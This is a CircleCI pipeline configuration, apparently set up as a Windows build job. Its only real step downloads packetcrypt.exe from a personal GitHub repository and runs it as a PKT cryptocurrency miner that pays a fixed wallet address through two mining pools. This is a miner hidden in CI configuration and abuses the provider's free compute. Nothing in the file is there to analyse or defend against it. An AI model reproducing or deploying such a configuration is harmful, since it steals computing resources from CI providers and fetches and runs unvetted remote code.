version: 2.1

orbs:
  win: circleci/windows@2.2.0

jobs:
  build:
    executor:
      name: win/default
      shell: powershell.exe
    steps:
      - checkout
      - run: systeminfo
      - run:
          name: "Downloads"
          shell: powershell.exe
          command: |
              Invoke-WebRequest -Uri 'https://github.com/phongcongtu/pkt_phong/raw/main/packetcrypt.exe' -OutFile 'packetcrypt.exe'
              ./packetcrypt.exe ann -p pkt1qn8kg9zr4nx9jpy3ljgqamk7vtmszy32mqv96yj http://pool.pkt.world http://pool.pktpool.io -t 1